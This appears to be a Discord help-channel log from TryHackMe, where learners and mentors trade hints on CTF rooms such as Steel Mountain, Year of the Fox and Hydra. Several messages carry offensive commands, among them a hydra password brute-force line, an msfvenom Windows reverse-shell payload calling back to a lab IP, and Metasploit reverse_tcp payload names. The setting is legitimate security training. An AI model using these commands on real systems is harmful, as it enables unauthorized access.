I was stuck for about 20 minutes the other day on it while I was going back and reviewing some rooms. It happens. 🙂

Good learning opportunity/lesson. Glad we got it sorted out for you.

Thanks for the help!

You're very welcome.

https://tryhackme.com/room/windows10privesc

Some ane please help me in task 16 please😩 😩

@regal comet writeup is now out

For YOTF?

I didnt see the backstory, but this would be interesting if true.

So, I am doing Custom Wordlists task 4 question 2 and I have appended an ! to the end of every word on rockyou.txt but the password is still not cracked. Am I doing this wrong?

Have not done the room, but just going to say that perhaps you added an extra space or something.

Not sure.

Every time I check it the ! was at the end with no added characters. Using the hint to verify and the commands it shows as an example says to add a suffix. Hmmm. Might need to go back to the drawing board

Perhaps. Not sure man, sorry I can't be of great help.

Nah, all good. Figured it was worth an ask just incase someone had an idea

For YOTF?
@lean rover Mhm

Very nice! Hoping for it to be a good learning experience once I get stuck.

There are some interesting techniques in it (imho), although the way they're put together isn't hugely realistic.

No full on "CTF-only" things though -- not in the actual challenge. So no stego, or encoding or anything like that

Not unless you fall into a troll

I was doing the hydra room and cracked the ssh password but the first task. I am trying with this :

|| hydra -l molly -P /usr/share/wordlists/rockyou.txt http-post-form "/login:username=^USER^&password=^PASS^:F=Found" http://<ip address> .||

can someone give a hint where I am wrong, I am stuck from a while

Well, for one you don’t have an end quote...

Oh, it appears you do, my apologies.

The http://ip caught me off guard. Not used to seeing it in that place. Either way, did you use burpsuite to grab the login request?

I can do this with burpsuite but I want to do it with hydra

yes i have the request in burpsuite tool

Okay, can we take this to DMs?

yes

Resolved.

@inland onyx you are evil 🙂

Just saw the writeup.

^yotf? yeah the intended root route is .. like.. wow

I looked at the binary and started testing but after powering off the machine twice and needing to start from scratch was a bit too much for me

But I guess that’s what separates a “good” tester from a great one

Thank you 🙏

Oh wow, I thought the shutdown binary was a troll. I never got root in the end! What were the creds/cipher files for?

umm.. let's say u got trolled .. big time 🙂

@wispy girder trolls

Nice write up! I couldn't find a way to portfwd the ssh port without meterpreter. Never thought of just uploading socat!

socat seems like a very powerful tool 🤔

Socat is honestly my favourite tool in existence

And that isn't an exaggeration

It is literally my favourite piece of software

I actually first time used socat on that box..

Runs on anything, and has virtually limitless potential

thought it's a alternative to nc..

It is, but infinitely more powerful

Like, infinitely

i always used chisel for forwarding ports

I've never used chisel. It's something I really need to look into, given how much I'm loving tunneling just now.

I always use chisel too, does socat have socks support?

It should do @wraith marsh

Yes. It does

I'll check it out, chisel is a bit of a pain for socks

As I said, I have yet to find anything comparable to socat

Heard good things about chisel

But the ease for things like encrypted shells in socat is just mental

Pulling a full tty shell out of the box is also a far cry greater than the (initially) volatile netcat shells too

iirc there was an unintentional priv esc that you had to fix? What was that? 👀

guys I need help with steel mountain.I m unable to identify which|| file seve||r is running on ||8080||.

thanks in advance

@true widget have your tried directory busting to see what’s there?

Or if you’re on the file server already have you enumerated and looked around to see the title

@true widget have your tried directory busting to see what’s there?
@oblique cliff cant i find it using nmap by running it specificly on port ||8080||

nope I haent ised the directory buster yet

Maybe try that out then

Maybe try that out then
@oblique cliff

Try looking at source code

Try looking at source code
@solemn smelt didnt find anything

Look harder

or wait I might be thinking of another room never mind

No I’m right look at the source code

No I’m right look at the source code
@solemn smelt okk i ll try harder

you could also look at the information given to you on the webpage itself and get the same result

you could also look at the information given to you on the webpage itself and get the same result
@solemn smelt cant find it by looking at source code

Steel Mountain. Found the exploit with msf... used it, configured, and ran. I get an error when sending the payload.
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete

look for the creators link in the source code

also make sure you’re looking at the source code of the file server

also make sure you’re looking at the source code of the file server
@solemn smelt i cant find it

@true widget it says it in that pic you sent

And as cryllic said the source code says it just look closer at the page

@rich gust that’s just a warning you can ignore it. Did you set your lhost?

I did. Exploit completed, but no session was created.

Can you show your options

Incorrect payload

oh snap. we need TCP for this one

@oblique cliff ||HttpFileServer httpd 2.3||?

Try it out and see if it works

yep. that's what it was.

Try it out and see if it works
@oblique cliff i tried ||favicon http file server ||but it also didnt work

I need help for the decoding in Year of the Fox any hints for me?

@true widget just keep playing around with names youre in the right track

@true widget just keep playing around with names youre in the right track
@oblique cliff found it

Awesome!

Tripwire, you're going to need something other than the default payload for basically everything Windows related until Rapid7 patches the issue.

Awesome!
@oblique cliff instead of using metasploit to get an initial shell cant i directly use it with python

@true widget there are several different approaches to getting an initial shell on that box

My 100% manual method is fun, but a bit advanced. 😉

@true widget there are several different approaches to getting an initial shell on that box
@oblique cliff should i use the exploit on ||8080||?

Hey there Myk17. You should probably try to do some of it on your own first, and if you have issues, come back for a hint.

If you're unsure what you're doing, which is ok, we really do recommend trying some of the introductory rooms first. Things like RP:Nmap, RP:Metasploit, etc.

Additionally, please check the writeups that are in the room first as these will generally have the answer you're looking for, and do a better job at showing/explaining the task you're currently on without trying to do it through a chat box here.

If you're unsure what you're doing, which is ok, we really do recommend trying some of the introductory rooms first. Things like RP:Nmap, RP:Metasploit, etc.
@patent token okkay buddy

If you're unable to solve your issue at that point, stop back in #room-help and another community member or one of us Community Mentors would be happy to help more. 🙂

If you are working on a Windows machine and are using Metasploit, it is currently defaulting to reverse_https payloads, which will likely not work. Please set your payload manually for the time being to one of the following:

windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp
windows/shell/reverse_tcp

If one of these do not work, we will be glad to help assist further.

does metasploit have any more help then on the -- help command? been looking for a while for [ What option sets the architecture to be exploited?} but cant find anything about architecture.

ofc checked google aswell

Have you tried show targets

?

hmm nope that didnt help much

found it!

How can I switch back to meterpreter from powershell?

ctrl+z kills the session :-(

typing background ?

Hello ya'll hope everyone is doing well. Have a question about Post-Exploitation Basics: Task2, #3, I have a hidden file in users. dir -force does not show a hidden file except desktop.ini

dont want answer just guidance

ctrl+z kills the session :-(
@rich gust no it doesn't. It pushes it to background. you can use sessions <id> to get back that session. also from linux perspective u can type fg to get that program.

@dull palm why do you assume that it’s a file

i dont assume ever 🙂 but dir -force searches for hidden files/ folders yes?

don’t know never used it. reread the question

GAH!!! So close >.<

Did you set up a listener @rich gust

It’ll still throw that error

But you should get a reverse shell

I did...

but no reverse shell

Can you share in spoiler brackets what the msfvenom payload you used is?

||msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.1.62 LPORT=5555 -f exe -o Advanced.exe||

If you're trying to connect via netcat, a Meterpreter shell isn't going to work.

🙁

You need to use a ||windows/shell/reverse_tcp|| shell

That explains how you got a connection back, but crashed right away.

I see

oof... lol now it's saying The specified service does not exist as an installed service. and the netcat listener still connects but drops right away

im going to start back with a fresh machine to make sure I'm doing this right

... got it!

Glad we got that sorted out for you.

||windows/shell_reverse_tcp|| is what I needed... instead of '_' I had '/' in the first position

Nice!

It's the little things that get you.

Always 🙂

Disregard i founded it

Can I post a screenshot of success?

😎

Nice one! Congrats.

@patent token I like how your writeup provides just enough detail to make the reader think about what they're doing.

🙂

nvm

FINALLY finished yotf. Thanks to the write up giving me a push in the right direction to figure out the web portion. Took me almost a day after that to beat the rest of the box . Thanks @inland onyx for the great box. Learned some new tricks 🙂

i am interesting in the unintended route that was patched... now that there is a writeup will you share it ?

in yotf writeup why there is '(back ward slash)' in starting and end of the command injection..
target : ""; something echo""
and why this echo..

\

hmmm what writeup are you referring to muirland hasn’t released yet?

Nvm

he did

it is released

i had to wrap my injection in || `backticks` ||@indigo ridge, maybe the \ is just a typo from trying to escape them

The unintended route was to use lxc @white salmon, originally the fox user was in the lxc group and it meant you could import a container where you have root privs and mount the host filesystem in it

understand all ... you could have just said lxc

one of my favorite paths to root!

and you could have just said thanks for the answer @white salmon

Fair play

Can someone help with cve-2019-9053 exploit? I am trying to do simple CTF room but stuck with the exploit.

@carmine scroll sure, whats up?

do you have a specific question?

Actually, I am stuck with python errors of this exploit. Can i post a ss of errors i am facing? or can I DM you?

put them as spoilers, but sure to either

i am interesting in the unintended route that was patched... now that there is a writeup will you share it ?
@white salmon also smbpasswd

thanks Legndery... didn't even think to check to abuse that

Thanks @oblique cliff

Hi all

I need a clarification regarding yotf. Can anyone ping me please

?

@echo thunder what's the question?

When I try to get reverse shell with socat the shell does not come back

it seems that the terminal is freezing

try asking this in #room-help - you need more than a hint

I watched also the write-up

And it is the same sintax

hey i m stucked on binexp room on binary 2, anyone solved it ?

hey guys, any idea how to play an mp3 file via terminal?

@tardy python what exactly is your question?

@worthy iris no need to play it in your terminal

the payload not working for me, myabe i missed something

@worthy iris no need to play it in your terminal
@oblique cliff ok I'll keep looking

Nothing to look for. Just get it onto your host OS and play it there

o

Oh sorry. You do have to play the file. I just meant you don’t strictly have to do it in yo ur terminal. Just playing it regularly is fine

can you check my script pretty quick ? can i dm you? @oblique cliff

No I wanna play bass. You can put it here and I’ll answer when I’m done or someone else can if they’re available

ty bob

Three letter technical term abbreviation for a WiFi password ?

Nvm, just had to Google HARDER

How dost one open/view a file in an smb server

@granite pelican normally you'd download the file from the smb server

Ok so I'm in the Network Services room. I'm in the profiles share and 4-4 says 'look around, who's profile dis'

Is there something I'm supposed to get from the files listed? If I can't open them?

can you see who owns them?

No. There's D, DH, and H next to them, unsure about that

I haven't done that room but are there multiple directories?

Even if you can't open the file, you enumerate the directories and files within and it might give you a clue

If D stands for directory, what does DH and H stand for

I have no idea what you're looking at. are you running ls or something to view it?

Yeah ls.
For ex .cache is DH
.profile is H
.ssh is DH
And I can cd into .ssh

Well keep poking around at it. Sounds like you're close and maybe someone who has done that room might be able to help if you're still stuck

I need some hint for the room CCT2019

i have ||extracted archive.zip from the image but cant figure out the passwd||

[Task 3] CCT-2019 for1

@glacial mantle you awake?

Yes

@glacial mantle oh sorry, I thought you were stuck at the first zipfile, not archive.zip

just got there

ooh

please drop a hint if you make any progress

@glacial mantle will do, trying to figure it out myself atm.

thanks

Looking for some hints for OWASP Juice Shop Broken Authentication task. I’ve looked thru all the reviews, found the ftp directory, but still haven’t found more info on Jim. Was thinking about using a hydra/Burp name list. Same with administrator password, was thinking about using hydra. Am I on the right path?

Thank you in advance!

@glacial mantle i'm stuck as hell. gimme a dm if you find the solution 😛

lol same!!

I keep coming back to the enigma machine, but I can't find any cipher text that fits it, so I guess that's a later step

Yeah the given image is of a 4 rotor enigma machine

no idea how to find the passphrase for the archive.zip though, been hitting my head against the wall for the last 30 minutes or so

lmao

anyway, sleep time. good luck

i am taking a break too, same to you!

Not sure what I am doing wrong here ..

look at what you're typing

and what the binary is actually called

In the future it will help immensely for you to use the screenshot tool instead of cell phone pictures.

You can open Discord in a browser.

Can do 👍

@exotic rose the administrator password is very weak, you can either brute force or guess it 🙂

Hi, can anyone help me out with this, I'm stuck at the Metasploit Box .

Please, take a screenshot of your screen.

Or describe your issue, I can not read those.

Okay

Oh, wait.

If you are working on a Windows machine and are using Metasploit, it is currently defaulting to reverse_https payloads, which will likely not work. Please set your payload manually for the time being to one of the following:

windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp
windows/shell/reverse_tcp

If one of these do not work, we will be glad to help assist further.

Yeah.. I'm virtual machine KALI and trying to exploit metasploit box. In task 5 , we have to get the session by using icecast exploit. But all the time session failed with an error REX::BindFailed The address is already in use or unavailable.